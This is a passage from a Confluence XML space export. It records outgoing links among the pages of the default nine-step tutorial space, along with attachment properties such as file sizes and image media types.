<property name="destinationPageTitle"><![CDATA[A quick look at the editor (step 2 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[a quick look at the editor (step 2 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196649</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Lay out your page (step 6 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[lay out your page (step 6 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196642</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196643</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Prettify the page with an image (step 4 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[prettify the page with an image (step 4 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196644</id>
|
||||
<property name="destinationPageTitle"><![CDATA[//maps.google.com/maps?q=Atlassian,+George+Street,+New+South+Wales,+Australia&hl=en&ll=-33.866572,151.207001&spn=0.004321,0.008256&sll=-33.870509,151.203707&sspn=0.008641,0.016512&oq=atlassian,&hq=Atlassian,+George+Street,+New+South+Wales,+Australia&radiu]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[//maps.google.com/maps?q=atlassian,+george+street,+new+south+wales,+australia&hl=en&ll=-33.866572,151.207001&spn=0.004321,0.008256&sll=-33.870509,151.203707&sspn=0.008641,0.016512&oq=atlassian,&hq=atlassian,+george+street,+new+south+wales,+australia&radiu]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[https]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[https]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196645</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Learn the wonders of autoconvert (step 7 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[learn the wonders of autoconvert (step 7 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196638</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Tell people what you think in a comment (step 8 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[tell people what you think in a comment (step 8 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196639</id>
|
||||
<property name="destinationPageTitle"><![CDATA[A quick look at the editor (step 2 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[a quick look at the editor (step 2 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196640</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Prettify the page with an image (step 4 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[prettify the page with an image (step 4 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196641</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196634</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196635</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Learn the wonders of autoconvert (step 7 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[learn the wonders of autoconvert (step 7 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196636</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196637</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Get serious with a table (step 5 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[get serious with a table (step 5 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196630</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98320</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196631</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196632</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Get serious with a table (step 5 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[get serious with a table (step 5 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196633</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Get serious with a table (step 5 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[get serious with a table (step 5 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196626</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Learn the wonders of autoconvert (step 7 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[learn the wonders of autoconvert (step 7 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196627</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196628</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Lay out your page (step 6 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[lay out your page (step 6 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196629</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Prettify the page with an image (step 4 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[prettify the page with an image (step 4 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196622</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Tell people what you think in a comment (step 8 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[tell people what you think in a comment (step 8 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196623</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196624</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262272</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">1</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196625</id>
|
||||
<property name="destinationPageTitle"><![CDATA[A quick look at the editor (step 2 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[a quick look at the editor (step 2 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98320</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262271</id>
|
||||
<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
|
||||
<property name="stringValue"/><property name="longValue">14</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196618</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Share your page with a team member (step 9 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[share your page with a team member (step 9 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262270</id>
|
||||
<property name="name"><![CDATA[macroNames]]></property>
|
||||
<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196619</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98306</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262269</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">9061</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196620</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Tell people what you think in a comment (step 8 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[tell people what you think in a comment (step 8 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98306</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262268</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/png]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196621</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98320</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262267</id>
|
||||
<property name="name"><![CDATA[HIDDEN]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196614</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Share your page with a team member (step 9 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[share your page with a team member (step 9 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98306</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262266</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">1</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196615</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262265</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/png]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196616</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262264</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">9592</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196617</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98306</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262263</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/png]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196610</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262262</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/png]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196611</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Tell people what you think in a comment (step 8 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[tell people what you think in a comment (step 8 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262261</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/png]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196612</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262260</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196613</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Lay out your page (step 6 of 9)]]></property>
|
||||
